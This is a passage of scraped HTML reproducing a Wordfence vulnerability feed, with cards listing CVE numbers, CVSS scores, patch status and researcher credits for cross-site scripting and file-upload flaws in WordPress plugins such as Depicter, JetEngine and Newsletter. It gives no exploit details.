<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</a> <span class="wfvr-software-slug">[contest-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a9ec4eb223d84f01746308316732603e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a9ec4eb223d84f01746308316732603e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thaer-assfour" target="_blank" rel="noopener">Thaer Assfour</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1f308cc-2ea9-4c67-9c1b-4f2e4676b2c2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85446b44-8f66-40d3-ad1e-d5d52479cd96" target="_blank" rel="noopener">Depicter — Popup &amp; Slider Builder &lt; 4.8.0 &#8211; Authenticated (Editor+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15049" target="_blank" rel="noopener noreferrer">							CVE-2026-15049						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/depicter" target="_blank" rel="noopener">Depicter — Popup &amp; Slider Builder</a> <span class="wfvr-software-slug">[depicter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/55478b939c5cdb4a8cfa65ea7f5081fe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="55478b939c5cdb4a8cfa65ea7f5081fe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener">Md. Minaruzzaman Shovon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85446b44-8f66-40d3-ad1e-d5d52479cd96" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17b6caa3-3566-48d4-988a-5a0f22b2a3f2" target="_blank" rel="noopener">EasyTest – Simplify A/B Testing &lt;= 1.0.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-68567" target="_blank" rel="noopener noreferrer">							CVE-2026-68567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/convertpro-2" target="_blank" rel="noopener">EasyTest – Simplify A/B Testing</a> <span class="wfvr-software-slug">[convertpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9fe3b597e2bbd23928882d43475fdeb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9fe3b597e2bbd23928882d43475fdeb9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener">timomangcut</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17b6caa3-3566-48d4-988a-5a0f22b2a3f2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/737e3b2c-ee39-476a-b928-e496e7aeb5fe" target="_blank" rel="noopener">Events Made Easy &lt;= 3.2.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28162" target="_blank" rel="noopener noreferrer">							CVE-2026-28162						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-made-easy" target="_blank" rel="noopener">Events Made Easy</a> <span class="wfvr-software-slug">[events-made-easy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4a36854ce1b3d726839f26041f205bdd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4a36854ce1b3d726839f26041f205bdd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener">sequence_X0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/737e3b2c-ee39-476a-b928-e496e7aeb5fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04c2b756-72b3-4edb-8ee7-3ee0cb9c25e6" target="_blank" rel="noopener">Flatastic &#8211; Versatile MultiVendor WordPress Theme &lt;= 2.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66673" target="_blank" rel="noopener noreferrer">							CVE-2026-66673						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66672" target="_blank" rel="noopener">Flatastic &#8211; Versatile MultiVendor WordPress Theme</a> <span class="wfvr-software-slug">[flatastic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/04c2b756-72b3-4edb-8ee7-3ee0cb9c25e6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c22d6da6-84a1-4bc1-bcd1-123a5c956f93" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack &lt; 6.2.12 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66633" target="_blank" rel="noopener noreferrer">							CVE-2026-66633						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack</a> <span class="wfvr-software-slug">[fluentformpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c22d6da6-84a1-4bc1-bcd1-123a5c956f93" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4bcd44e-2677-4d53-9404-350979915647" target="_blank" rel="noopener">Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder &lt;= 1.15.46 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66616" target="_blank" rel="noopener noreferrer">							CVE-2026-66616						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-maker" target="_blank" rel="noopener">Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder</a> <span class="wfvr-software-slug">[form-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/elijah-chia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/80acc63fe639092e6ec9dc58c837f8fc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="80acc63fe639092e6ec9dc58c837f8fc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/elijah-chia" target="_blank" rel="noopener">Elijah Chia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4bcd44e-2677-4d53-9404-350979915647" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d28ff12-e267-44b2-b9fe-8270cdd7b540" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO &lt;= 14.2.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66614" target="_blank" rel="noopener noreferrer">							CVE-2026-66614						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO</a> <span class="wfvr-software-slug">[squirrly-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d28ff12-e267-44b2-b9fe-8270cdd7b540" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64506fb9-5f12-458e-8b30-ab650a752668" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory &lt;= 2.8.173 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66604" target="_blank" rel="noopener noreferrer">							CVE-2026-66604						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodirectory" target="_blank" rel="noopener">GeoDirectory – WP Business Directory Plugin and Classified Listings Directory</a> <span class="wfvr-software-slug">[geodirectory]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dunvu0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2684dcb50089a43f8e0fef676bbf357a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2684dcb50089a43f8e0fef676bbf357a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dunvu0" target="_blank" rel="noopener">dunvu0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64506fb9-5f12-458e-8b30-ab650a752668" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4b01a3-0479-48f1-b5d8-bc49266a43ca" target="_blank" rel="noopener">Global Gallery &#8211; WordPress Responsive Gallery &lt;= 11.1.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73184" target="_blank" rel="noopener noreferrer">							CVE-2026-73184						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/global-gallery" target="_blank" rel="noopener">Global Gallery &#8211; WordPress Responsive Gallery</a> <span class="wfvr-software-slug">[global-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4b01a3-0479-48f1-b5d8-bc49266a43ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0aa0d5cb-c74b-4687-a41c-a01810c20428" target="_blank" rel="noopener">JetEngine &lt;= 3.8.14.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66581" target="_blank" rel="noopener noreferrer">							CVE-2026-66581						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0aa0d5cb-c74b-4687-a41c-a01810c20428" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/191c7d9e-79a1-400d-8f05-5fab422ae042" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer &lt;= 6.2.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66629" target="_blank" rel="noopener noreferrer">							CVE-2026-66629						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/191c7d9e-79a1-400d-8f05-5fab422ae042" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26501f4b-2599-4c08-89cb-6e4b4996b974" target="_blank" rel="noopener">miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) &lt;= 7.8.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73351" target="_blank" rel="noopener noreferrer">							CVE-2026-73351						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</a> <span class="wfvr-software-slug">[miniorange-login-openid]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-moon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da7c49ec64423fe639d209c7e2603c4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da7c49ec64423fe639d209c7e2603c4b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-moon" target="_blank" rel="noopener">hackthesoul</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/26501f4b-2599-4c08-89cb-6e4b4996b974" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f715ba3-7f86-42b7-81fc-3bbaa76ae671" target="_blank" rel="noopener">Newsletter – Send awesome emails from WordPress &lt;= 9.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66596" target="_blank" rel="noopener noreferrer">							CVE-2026-66596						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter" target="_blank" rel="noopener">Newsletter – Send awesome emails from WordPress</a> <span class="wfvr-software-slug"><div class="tnp tnp-subscription ">
<form method="post" action="https://swiftupdates.ca/wp-admin/admin-ajax.php?action=tnp&amp;na=s">
<input type="hidden" name="nlang" value="">
<div class="tnp-field tnp-field-firstname"><label for="tnp-1">Name</label>
<input class="tnp-name" type="text" name="nn" id="tnp-1" value="" placeholder="" required></div>
<div class="tnp-field tnp-field-email"><label for="tnp-2">Email</label>
<input class="tnp-email" type="email" name="ne" id="tnp-2" value="" placeholder="" required></div>
<div class="tnp-field tnp-field-button" style="text-align: left"><input class="tnp-submit" type="submit" value="Subscribe" style="">
</div>
</form>
</div>
</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f715ba3-7f86-42b7-81fc-3bbaa76ae671" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
